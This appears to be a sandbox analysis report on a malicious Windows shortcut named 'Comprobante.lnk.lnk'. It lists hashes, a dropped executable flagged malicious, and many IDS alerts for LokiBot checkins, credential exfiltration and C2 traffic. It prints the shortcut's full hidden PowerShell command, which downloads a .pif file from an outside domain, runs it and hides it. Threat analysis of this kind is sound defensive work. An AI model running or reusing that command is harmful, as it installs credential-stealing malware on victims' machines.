                                                          Preview:...................................FL..................F.`.. ..._:&!w......d.....).d................................P.O. .:i.....+00.:...:..,.LB.)...A&...&......i..5q......&w......d.....t.2.....CY.: .COMPRO~1.LNK..X......EW.SCY.:....:..... ...............c.G.C.o.m.p.r.o.b.a.n.t.e...l.n.k...l.n.k.......X...............-.......W.............$`.....C:\Users\user\Desktop\Comprobante.lnk.lnk.. .c.:.\.w.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2.\.d.d.i.s.p.l.a.y...d.l.l.........%SystemRoot%\system32\ddisplay.dll..................................................................................................................................................................................................................................%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.d.d.i.s.p.l.a.y...d.l.l.........................................................................................................................................................................................................
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):371712
                                                          Entropy (8bit):7.854168969155107
                                                          Encrypted:false
                                                          SSDEEP:6144:Mt0VqnKoq12xV+0+LGQ3orU7K9ORPCfQzyI4w2Q8y7tRQG9oeGdwpx6sqyqqQlh4:MIqnJV+3GTQVzZ+MXf6Ex6sqyqqQlhcl
                                                          MD5:DB94D5DF4ADD0A06F261EAE73C2DA5DB
                                                          SHA1:A37FFECD4004127C3EE2E4ED8F2E5D507C418DC1
                                                          SHA-256:8CF4CC35E623A326F1B5FE4892F5D5E44272925F33B7439E675EDFC81BA2AF70
                                                          SHA-512:8FC3F52D241CD06DB33BCC6FB85564A4FD3EE171E154162B2FB5B1C8E63216CD0F470EBE9DDC1D5E093B4713E1E93DF33D696EED0258D89E3A33B68D47B3CC67
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...QA.f............................. ... ... ....@.. .......................@............`.................................$'..W.......8............................................................................ ............... ..H...........j1CM!e^U..... ......................@....text....... ...................... ..`.rsrc...8...........................@..@.reloc..............................@..B............. ...................... ..`........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          File type:MS Windows shortcut, Item id list present, Has Description string, Has Relative path, Has command line arguments, Icon number=0, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hide
                                                          Entropy (8bit):2.85461617569427
                                                          TrID:
                                                          • Windows Shortcut (20020/1) 100.00%
                                                          File name:Comprobante.lnk.lnk
                                                          File size:2'530 bytes
                                                          MD5:8c19af87f9129a49e35158f93815eb7f
                                                          SHA1:9a6c4b22c2e5bf7f039eb2ad20d0822c0e913d14
                                                          SHA256:245f1f3463841248c78c4917dc1a846419f92d957132fabf0b4ee4501dcb6198
                                                          SHA512:829aa9dea154d1ac2493bee30b32fc518f0c6a595b806aefd13652591424acf885135da1eafbb1641a40fa6d84761229ea54c45bfefa7bf3f300461043f558df
                                                          SSDEEP:24:8z/BHYVKI1S+/CSHw7fPE+g1rwpTukQsC8bCHrPvbCfVbCp9uf254o0J5/:8z5aWXE+g1r0qkQ4EbeVg9zmo8
                                                          TLSH:D7516524ABE51314E2F78F3D7CBAA244897A7C45FE218BCC025081891C35714E675F3B
                                                          File Content Preview:L..................F.@...........................................................P.O. .:i.....+00.../C:\...................V.1...........Windows.@.............................................W.i.n.d.o.w.s.....Z.1...........System32..B.....................
                                                          Icon Hash:74f0e4e4e4e1e1ed

                                                          General

                                                          Relative Path:..\..\..\Windows\System32\WindowsPowerShell\v1.0\PoWeRShElL.exe
                                                          Command Line Argument:-ExecutionPolicy Bypass -WindowStyle hiDDEn -HiDdEn -Command ddisplay.dll;(new-object System.Net.WebClient).DownloadFile('https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.pif','screens.pif');./'screens.pif';(get-item 'screens.pif').Attributes += 'Hidden';
                                                          Icon location:c:\windows\system32\ddisplay.dll
                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                          2024-10-03T09:20:31.352609+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1049734TCP
                                                          2024-10-03T09:20:31.352609+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1049776TCP
                                                          2024-10-03T09:20:31.352609+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1049752TCP
                                                          2024-10-03T09:20:31.352609+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1049753TCP
                                                          2024-10-03T09:20:31.352609+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1049775TCP
                                                          2024-10-03T09:20:46.743247+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.104970745.149.241.16980TCP
                                                          2024-10-03T09:20:46.743247+02002025381ET MALWARE LokiBot Checkin1192.168.2.104970745.149.241.16980TCP
                                                          2024-10-03T09:20:46.743247+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.104970745.149.241.16980TCP
                                                          2024-10-03T09:20:47.526720+02002024312ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M11192.168.2.104970745.149.241.16980TCP
                                                          2024-10-03T09:20:47.692236+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.104970845.149.241.16980TCP
                                                          2024-10-03T09:20:47.692236+02002025381ET MALWARE LokiBot Checkin1192.168.2.104970845.149.241.16980TCP
                                                          2024-10-03T09:20:47.692236+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.104970845.149.241.16980TCP
                                                          2024-10-03T09:20:48.453317+02002024312ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M11192.168.2.104970845.149.241.16980TCP
                                                          2024-10-03T09:20:48.567976+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.104970945.149.241.16980TCP
                                                          2024-10-03T09:20:48.567976+02002025381ET MALWARE LokiBot Checkin1192.168.2.104970945.149.241.16980TCP
                                                          2024-10-03T09:20:48.567976+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.104970945.149.241.16980TCP
                                                          2024-10-03T09:20:56.428033+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.104970945.149.241.16980TCP
                                                          2024-10-03T09:20:56.428033+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.104970945.149.241.16980TCP
                                                          2024-10-03T09:20:56.433087+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1049709TCP
                                                          2024-10-03T09:20:56.608552+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.104971545.149.241.16980TCP
                                                          2024-10-03T09:20:56.608552+02002025381ET MALWARE LokiBot Checkin1192.168.2.104971545.149.241.16980TCP
                                                          2024-10-03T09:20:56.608552+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.104971545.149.241.16980TCP
                                                          2024-10-03T09:20:57.649849+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.104971545.149.241.16980TCP
                                                          2024-10-03T09:20:57.649849+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.104971545.149.241.16980TCP
                                                          2024-10-03T09:20:58.057510+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1049715TCP
                                                          2024-10-03T09:20:58.316279+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.104971645.149.241.16980TCP
                                                          2024-10-03T09:20:58.316279+02002025381ET MALWARE LokiBot Checkin1192.168.2.104971645.149.241.16980TCP
                                                          2024-10-03T09:20:58.316279+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.104971645.149.241.16980TCP
                                                          2024-10-03T09:20:59.140817+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.104971645.149.241.16980TCP
                                                          2024-10-03T09:20:59.140817+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.104971645.149.241.16980TCP
                                                          2024-10-03T09:20:59.146093+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1049716TCP
                                                          2024-10-03T09:20:59.297568+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.104971745.149.241.16980TCP
                                                          2024-10-03T09:20:59.297568+02002025381ET MALWARE LokiBot Checkin1192.168.2.104971745.149.241.16980TCP
                                                          2024-10-03T09:20:59.297568+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.104971745.149.241.16980TCP
                                                          2024-10-03T09:21:00.116580+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.104971745.149.241.16980TCP
                                                          2024-10-03T09:21:00.116580+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.104971745.149.241.16980TCP
                                                          2024-10-03T09:21:00.189299+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1049717TCP
                                                          2024-10-03T09:21:00.494707+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.104971845.149.241.16980TCP
                                                          2024-10-03T09:21:00.494707+02002025381ET MALWARE LokiBot Checkin1192.168.2.104971845.149.241.16980TCP
                                                          2024-10-03T09:21:00.494707+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.104971845.149.241.16980TCP
                                                          2024-10-03T09:21:01.613318+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.104971845.149.241.16980TCP
                                                          2024-10-03T09:21:01.613318+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.104971845.149.241.16980TCP
                                                          2024-10-03T09:21:01.618178+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1049718TCP
                                                          2024-10-03T09:21:01.777716+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.104971945.149.241.16980TCP
                                                          2024-10-03T09:21:01.777716+02002025381ET MALWARE LokiBot Checkin1192.168.2.104971945.149.241.16980TCP
                                                          2024-10-03T09:21:01.777716+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.104971945.149.241.16980TCP
                                                          2024-10-03T09:21:03.526211+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.104971945.149.241.16980TCP
                                                          2024-10-03T09:21:03.526211+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.104971945.149.241.16980TCP
                                                          2024-10-03T09:21:03.531218+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1049719TCP
                                                          2024-10-03T09:21:03.684048+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.104972045.149.241.16980TCP
                                                          2024-10-03T09:21:03.684048+02002025381ET MALWARE LokiBot Checkin1192.168.2.104972045.149.241.16980TCP
                                                          2024-10-03T09:21:03.684048+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.104972045.149.241.16980TCP
                                                          2024-10-03T09:21:04.410658+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.104972045.149.241.16980TCP
                                                          2024-10-03T09:21:04.410658+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.104972045.149.241.16980TCP
                                                          2024-10-03T09:21:04.415995+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1049720TCP
                                                          2024-10-03T09:21:04.600648+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.104972145.149.241.16980TCP
                                                          2024-10-03T09:21:04.600648+02002025381ET MALWARE LokiBot Checkin1192.168.2.104972145.149.241.16980TCP
                                                          2024-10-03T09:21:04.600648+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.104972145.149.241.16980TCP
                                                          2024-10-03T09:21:05.365447+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.104972145.149.241.16980TCP
                                                          2024-10-03T09:21:05.365447+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.104972145.149.241.16980TCP
                                                          2024-10-03T09:21:05.371100+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1049721TCP
                                                          2024-10-03T09:21:05.528198+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.104972245.149.241.16980TCP
                                                          2024-10-03T09:21:05.528198+02002025381ET MALWARE LokiBot Checkin1192.168.2.104972245.149.241.16980TCP
                                                          2024-10-03T09:21:05.528198+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.104972245.149.241.16980TCP
                                                          2024-10-03T09:21:06.262913+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.104972245.149.241.16980TCP
                                                          2024-10-03T09:21:06.262913+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.104972245.149.241.16980TCP
                                                          2024-10-03T09:21:06.270016+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1049722TCP
                                                          2024-10-03T09:21:06.423848+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.104972345.149.241.16980TCP
                                                          2024-10-03T09:21:06.423848+02002025381ET MALWARE LokiBot Checkin1192.168.2.104972345.149.241.16980TCP
                                                          2024-10-03T09:21:06.423848+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.104972345.149.241.16980TCP
                                                          2024-10-03T09:21:07.156686+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.104972345.149.241.16980TCP
                                                          2024-10-03T09:21:07.156686+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.104972345.149.241.16980TCP
                                                          2024-10-03T09:21:07.162168+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1049723TCP
                                                          2024-10-03T09:21:07.339146+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.104972445.149.241.16980TCP
                                                          2024-10-03T09:21:07.339146+02002025381ET MALWARE LokiBot Checkin1192.168.2.104972445.149.241.16980TCP
                                                          2024-10-03T09:21:07.339146+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.104972445.149.241.16980TCP
                                                          2024-10-03T09:21:08.095625+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.104972445.149.241.16980TCP
                                                          2024-10-03T09:21:08.095625+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.104972445.149.241.16980TCP
                                                          2024-10-03T09:21:08.100420+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1049724TCP
                                                          2024-10-03T09:21:08.254833+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.104972545.149.241.16980TCP
                                                          2024-10-03T09:21:08.254833+02002025381ET MALWARE LokiBot Checkin1192.168.2.104972545.149.241.16980TCP
                                                          2024-10-03T09:21:08.254833+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.104972545.149.241.16980TCP
                                                          2024-10-03T09:21:09.011680+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.104972545.149.241.16980TCP
                                                          2024-10-03T09:21:09.011680+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.104972545.149.241.16980TCP
                                                          2024-10-03T09:21:09.016619+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1049725TCP
                                                          2024-10-03T09:21:09.163793+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.104972645.149.241.16980TCP
                                                          2024-10-03T09:21:09.163793+02002025381ET MALWARE LokiBot Checkin1192.168.2.104972645.149.241.16980TCP
                                                          2024-10-03T09:21:09.163793+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.104972645.149.241.16980TCP
                                                          2024-10-03T09:21:09.861236+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.104972645.149.241.16980TCP
                                                          2024-10-03T09:21:09.861236+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.104972645.149.241.16980TCP
                                                          2024-10-03T09:21:09.866203+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1049726TCP
                                                          2024-10-03T09:21:10.038728+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.104972745.149.241.16980TCP
                                                          2024-10-03T09:21:10.038728+02002025381ET MALWARE LokiBot Checkin1192.168.2.104972745.149.241.16980TCP
                                                          2024-10-03T09:21:10.038728+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.104972745.149.241.16980TCP
                                                          2024-10-03T09:21:10.868266+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.104972745.149.241.16980TCP
                                                          2024-10-03T09:21:10.868266+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.104972745.149.241.16980TCP
                                                          2024-10-03T09:21:10.873454+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1049727TCP
                                                          2024-10-03T09:21:11.038525+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.104972845.149.241.16980TCP
                                                          2024-10-03T09:21:11.038525+02002025381ET MALWARE LokiBot Checkin1192.168.2.104972845.149.241.16980TCP
                                                          2024-10-03T09:21:11.038525+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.104972845.149.241.16980TCP
                                                          2024-10-03T09:21:11.918016+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.104972845.149.241.16980TCP
                                                          2024-10-03T09:21:11.918016+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.104972845.149.241.16980TCP
                                                          2024-10-03T09:21:11.922869+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1049728TCP
                                                          2024-10-03T09:21:12.097651+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.104972945.149.241.16980TCP
                                                          2024-10-03T09:21:12.097651+02002025381ET MALWARE LokiBot Checkin1192.168.2.104972945.149.241.16980TCP
                                                          2024-10-03T09:21:12.097651+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.104972945.149.241.16980TCP
                                                          2024-10-03T09:21:12.878143+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.104972945.149.241.16980TCP
                                                          2024-10-03T09:21:12.878143+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.104972945.149.241.16980TCP
                                                          2024-10-03T09:21:12.883774+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1049729TCP
                                                          2024-10-03T09:21:13.053982+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.104973045.149.241.16980TCP
                                                          2024-10-03T09:21:13.053982+02002025381ET MALWARE LokiBot Checkin1192.168.2.104973045.149.241.16980TCP
                                                          2024-10-03T09:21:13.053982+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.104973045.149.241.16980TCP
                                                          2024-10-03T09:21:13.804474+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.104973045.149.241.16980TCP
                                                          2024-10-03T09:21:13.804474+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.104973045.149.241.16980TCP
                                                          2024-10-03T09:21:13.809511+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1049730TCP
                                                          2024-10-03T09:21:13.963379+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.104973145.149.241.16980TCP
                                                          2024-10-03T09:21:13.963379+02002025381ET MALWARE LokiBot Checkin1192.168.2.104973145.149.241.16980TCP
                                                          2024-10-03T09:21:13.963379+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.104973145.149.241.16980TCP
                                                          2024-10-03T09:21:14.643309+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.104973145.149.241.16980TCP
                                                          2024-10-03T09:21:14.643309+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.104973145.149.241.16980TCP
                                                          2024-10-03T09:21:14.648261+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1049731TCP
                                                          2024-10-03T09:21:14.812196+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.104973245.149.241.16980TCP
                                                          2024-10-03T09:21:14.812196+02002025381ET MALWARE LokiBot Checkin1192.168.2.104973245.149.241.16980TCP
                                                          2024-10-03T09:21:14.812196+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.104973245.149.241.16980TCP
                                                          2024-10-03T09:21:15.448371+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.104973245.149.241.16980TCP
                                                          2024-10-03T09:21:15.448371+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.104973245.149.241.16980TCP
                                                          2024-10-03T09:21:15.453200+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1049732TCP
                                                          2024-10-03T09:21:15.631002+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.104973345.149.241.16980TCP
                                                          2024-10-03T09:21:15.631002+02002025381ET MALWARE LokiBot Checkin1192.168.2.104973345.149.241.16980TCP
                                                          2024-10-03T09:21:15.631002+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.104973345.149.241.16980TCP
                                                          2024-10-03T09:21:17.426363+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.104973345.149.241.16980TCP
                                                          2024-10-03T09:21:17.426363+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.104973345.149.241.16980TCP
                                                          2024-10-03T09:21:17.431251+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1049733TCP
                                                          2024-10-03T09:21:17.618667+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.104973445.149.241.16980TCP
                                                          2024-10-03T09:21:17.618667+02002025381ET MALWARE LokiBot Checkin1192.168.2.104973445.149.241.16980TCP
                                                          2024-10-03T09:21:17.618667+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.104973445.149.241.16980TCP
                                                          2024-10-03T09:21:18.676941+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.104973445.149.241.16980TCP
                                                          2024-10-03T09:21:18.676941+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.104973445.149.241.16980TCP
                                                          2024-10-03T09:21:18.848565+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.104973545.149.241.16980TCP
                                                          2024-10-03T09:21:18.848565+02002025381ET MALWARE LokiBot Checkin1192.168.2.104973545.149.241.16980TCP
                                                          2024-10-03T09:21:18.848565+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.104973545.149.241.16980TCP
                                                          2024-10-03T09:21:19.692115+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.104973545.149.241.16980TCP
                                                          2024-10-03T09:21:19.692115+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.104973545.149.241.16980TCP
                                                          2024-10-03T09:21:19.697873+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1049735TCP
                                                          2024-10-03T09:21:20.073300+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.104973645.149.241.16980TCP
                                                          2024-10-03T09:21:20.073300+02002025381ET MALWARE LokiBot Checkin1192.168.2.104973645.149.241.16980TCP
                                                          2024-10-03T09:21:20.073300+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.104973645.149.241.16980TCP
                                                          2024-10-03T09:21:20.718523+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.104973645.149.241.16980TCP
                                                          2024-10-03T09:21:20.718523+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.104973645.149.241.16980TCP
                                                          2024-10-03T09:21:20.723425+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1049736TCP
                                                          2024-10-03T09:21:20.894549+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.104973745.149.241.16980TCP
                                                          2024-10-03T09:21:20.894549+02002025381ET MALWARE LokiBot Checkin1192.168.2.104973745.149.241.16980TCP
                                                          2024-10-03T09:21:20.894549+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.104973745.149.241.16980TCP
                                                          2024-10-03T09:21:21.526883+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.104973745.149.241.16980TCP
                                                          2024-10-03T09:21:21.526883+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.104973745.149.241.16980TCP
                                                          2024-10-03T09:21:21.531766+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1049737TCP
                                                          2024-10-03T09:21:21.709486+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.104973845.149.241.16980TCP
                                                          2024-10-03T09:21:21.709486+02002025381ET MALWARE LokiBot Checkin1192.168.2.104973845.149.241.16980TCP
                                                          2024-10-03T09:21:21.709486+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.104973845.149.241.16980TCP
                                                          2024-10-03T09:21:22.447679+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.104973845.149.241.16980TCP
                                                          2024-10-03T09:21:22.447679+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.104973845.149.241.16980TCP
                                                          2024-10-03T09:21:22.455429+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1049738TCP
                                                          2024-10-03T09:21:22.731827+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.104973945.149.241.16980TCP
                                                          2024-10-03T09:21:22.731827+02002025381ET MALWARE LokiBot Checkin1192.168.2.104973945.149.241.16980TCP
                                                          2024-10-03T09:21:22.731827+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.104973945.149.241.16980TCP
                                                          2024-10-03T09:21:23.391639+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.104973945.149.241.16980TCP
                                                          2024-10-03T09:21:23.391639+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.104973945.149.241.16980TCP
                                                          2024-10-03T09:21:23.396516+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1049739TCP
                                                          2024-10-03T09:21:23.541526+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.104974045.149.241.16980TCP
                                                          2024-10-03T09:21:23.541526+02002025381ET MALWARE LokiBot Checkin1192.168.2.104974045.149.241.16980TCP
                                                          2024-10-03T09:21:23.541526+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.104974045.149.241.16980TCP
                                                          2024-10-03T09:21:24.274196+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.104974045.149.241.16980TCP
                                                          2024-10-03T09:21:24.274196+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.104974045.149.241.16980TCP
                                                          2024-10-03T09:21:24.279091+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1049740TCP
                                                          2024-10-03T09:21:24.429751+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.104974145.149.241.16980TCP
                                                          2024-10-03T09:21:24.429751+02002025381ET MALWARE LokiBot Checkin1192.168.2.104974145.149.241.16980TCP
                                                          2024-10-03T09:21:24.429751+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.104974145.149.241.16980TCP
                                                          2024-10-03T09:21:25.101836+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.104974145.149.241.16980TCP
                                                          2024-10-03T09:21:25.101836+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.104974145.149.241.16980TCP
                                                          2024-10-03T09:21:25.106678+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1049741TCP
                                                          2024-10-03T09:21:25.256730+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.104974245.149.241.16980TCP
                                                          2024-10-03T09:21:25.256730+02002025381ET MALWARE LokiBot Checkin1192.168.2.104974245.149.241.16980TCP
                                                          2024-10-03T09:21:25.256730+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.104974245.149.241.16980TCP
                                                          2024-10-03T09:21:25.961812+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.104974245.149.241.16980TCP
                                                          2024-10-03T09:21:25.961812+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.104974245.149.241.16980TCP
                                                          2024-10-03T09:21:25.966662+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1049742TCP
                                                          2024-10-03T09:21:26.118736+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.104974345.149.241.16980TCP
                                                          2024-10-03T09:21:26.118736+02002025381ET MALWARE LokiBot Checkin1192.168.2.104974345.149.241.16980TCP
                                                          2024-10-03T09:21:26.118736+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.104974345.149.241.16980TCP
                                                          2024-10-03T09:21:26.738758+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.104974345.149.241.16980TCP
                                                          2024-10-03T09:21:26.738758+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.104974345.149.241.16980TCP
